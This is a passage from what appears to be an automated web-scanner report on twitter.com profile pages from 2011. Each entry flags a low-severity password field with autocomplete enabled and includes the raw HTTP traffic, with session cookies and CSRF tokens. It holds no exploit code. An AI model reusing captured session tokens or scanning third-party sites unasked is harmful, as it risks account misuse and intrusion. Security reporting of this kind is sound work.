Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="92f23a4d4d7dc1fac1aab1018735e78381597f48" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.43. http://twitter.com/Jarvis_Green

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Jarvis_Green

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /Jarvis_Green HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265288-56506-41031
ETag: "1fbdd011dd022432b9be5211b927eb5e"
Last-Modified: Sat, 29 Jan 2011 01:41:28 GMT
X-Runtime: 0.00821
Content-Type: text/html; charset=utf-8
Content-Length: 29885
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.44. http://twitter.com/JennyMcCarthy

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /JennyMcCarthy

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /JennyMcCarthy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266001-863-44101
ETag: "f38aec6749f0462266c3dd505da4c784"
Last-Modified: Sat, 29 Jan 2011 01:53:22 GMT
X-Runtime: 0.01378
Content-Type: text/html; charset=utf-8
Content-Length: 49671
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="409933413c08a50945d04d4e00b13a424a876e6d" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.45. http://twitter.com/John_W_Henry

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /John_W_Henry

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /John_W_Henry HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266003-90291-22061
ETag: "39b5637104095258c2612985611f2081"
Last-Modified: Sat, 29 Jan 2011 01:53:23 GMT
X-Runtime: 0.00864
Content-Type: text/html; charset=utf-8
Content-Length: 40419
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="b6af0684313d732310309083ca564cb85a5484e4" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.46. http://twitter.com/KaseyRKahl

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /KaseyRKahl

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /KaseyRKahl HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265968-89789-38719
ETag: "91cc7fb3c644ed10961b8761bb947762"
Last-Modified: Sat, 29 Jan 2011 01:52:48 GMT
X-Runtime: 0.01025
Content-Type: text/html; charset=utf-8
Content-Length: 50928
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="fc18f2a88289a38592c1b469006863ffe1f903c7" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.47. http://twitter.com/KhloeKardashian

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /KhloeKardashian

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /KhloeKardashian HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266008-48453-14084
ETag: "a10b004421cd49a7bf1036242f788900"
Last-Modified: Sat, 29 Jan 2011 01:53:28 GMT
X-Runtime: 0.01326
Content-Type: text/html; charset=utf-8
Content-Length: 52081
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="ca4c973cd5b6a798a08f88a103a6753a510b0096" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.48. http://twitter.com/KimKardashian

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /KimKardashian

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /KimKardashian HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:58 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266038-98911-11256
ETag: "162e94dddb4eb4f4491a26acce7fb49a"
Last-Modified: Sat, 29 Jan 2011 01:53:58 GMT
X-Runtime: 0.37290
Content-Type: text/html; charset=utf-8
Content-Length: 49623
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIiVodHRwOi8vdHdpdHRlci5jb20vS2ltS2FyZGFz%250AaGlhbjoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--dd57a4fe4c4e017cb678d4f77a9a59706b7869bb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.49. http://twitter.com/Late_Show

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Late_Show

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: session[password]

Request

GET /Late_Show HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265286-91074-55312
ETag: "7b5d59ba88764ae8de6aa055d6a61048"
Last-Modified: Sat, 29 Jan 2011 01:41:26 GMT
X-Runtime: 0.00803
Content-Type: text/html; charset=utf-8
Content-Length: 39032
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="defb5341c4a19d2ef348ecd69b647831a8f831b3" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.50. http://twitter.com/LibertyHotel

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /LibertyHotel

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: session[password]

Request

GET /LibertyHotel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266043-37638-22569
ETag: "6f06fb302d73fdde5809f33e541f4c86"
Last-Modified: Sat, 29 Jan 2011 01:54:03 GMT
X-Runtime: 0.01451
Content-Type: text/html; charset=utf-8
Content-Length: 48481
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

